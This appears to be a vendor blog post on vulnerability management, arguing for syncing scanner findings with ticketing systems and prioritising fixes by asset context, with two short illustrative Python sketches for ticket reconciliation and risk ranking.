Integration with some sort of case management system is therefore a critical component of SDLC (software/security development life cycle) integration. It’s not just a nice-to-have checklist item – if you aren’t doing it, vulns are getting lost, and that’s just a fact. Worse yet, if you don’t have bi-directional communication, vulns can get closed and you’ll end up opening a new ticket every time you scan. Knowing which ticket corresponds to which scanner finding lets you see when a developer just wants to close a few tickets before 5PM on Friday. When the vulns all re-open on the next scan run, you’ll know who is trying to game the system, and therefore which developer/QA engineers are leaving you unnecessarily vulnerable.
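As an illustration only (the data model and ticket statuses here are invented), the heart of that bi-directional sync is matching findings to tickets by a stable fingerprint and re-opening whatever the scanner still sees:

```python
from dataclasses import dataclass

@dataclass
class Finding:
    fingerprint: str  # stable hash of (app, vuln class, location)
    details: str

def sync(findings: list[Finding], tickets: dict[str, str]) -> dict[str, str]:
    """Reconcile one scan run with a ticket store (fingerprint -> status)."""
    seen = {f.fingerprint for f in findings}
    for f in findings:
        status = tickets.get(f.fingerprint)
        if status is None:
            tickets[f.fingerprint] = "open"      # brand-new vuln
        elif status == "closed":
            tickets[f.fingerprint] = "reopened"  # "fixed" at 5PM Friday, still found
    for fp, status in tickets.items():
        if fp not in seen and status != "closed":
            tickets[fp] = "verified-fixed"       # scanner no longer sees it
    return tickets
```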

Then you have the whole issue of vuln priority. Without knowing something about the systems in question, you could inadvertently prioritize a vuln on an internal device ahead of something in production. Scanners are ultimately dumb (yes, it’s true, no matter how much we like to pretend they’re not) and they need to be told how to think about the environment. If your scanner can’t take in information from systems like Archer or similar GRC (Governance, Risk and Compliance) tools to know how important a site is, it’s entirely possible that you’re fixing the wrong issues in the wrong order. That puts your company unnecessarily at risk and wastes resources in the process.

There is a real art to making sure you are looking at the correct vulns. The more you think about it, the more you’ll probably agree this is the right path forward – adding in all sorts of additional/useful criteria. For instance, knowing how much a site is getting attacked is useful. Knowing which sites take and store PII (personally identifiable information) is useful. Knowing which sites live in the DMZ (de-militarized zone) together is useful. All of those things can help you prioritize and stop wasting time on vulns that either don’t matter because they’re nearly impossible to exploit or are less critical because they are protected by other controls.
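As a sketch of how that context could feed into ranking (the weights and asset attributes are entirely made up, not a recommendation):

```python
def risk_rank(base_severity: float, *, in_production: bool,
              stores_pii: bool, in_dmz: bool, attacks_per_day: float) -> float:
    """Re-rank a finding using asset context pulled from a GRC-style source.

    base_severity is the scanner's own 0-10 score; everything else is
    context the scanner cannot know on its own.
    """
    score = base_severity
    score *= 2.0 if in_production else 0.5          # internal boxes can wait
    if stores_pii:
        score *= 1.5                                # breach impact is higher
    if in_dmz:
        score *= 1.2                                # exposed alongside other targets
    score *= 1.0 + min(attacks_per_day / 100, 1.0)  # actively attacked sites first
    return score
```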

There’s obviously a lot more to it, but this should be a good primer on how to start thinking about vulns. If you want more information, we have several webinars that go into this in more gory detail. Either way, if you aren’t spending time identifying your assets and prioritizing them, you’re wasting time and money – and who’s got that?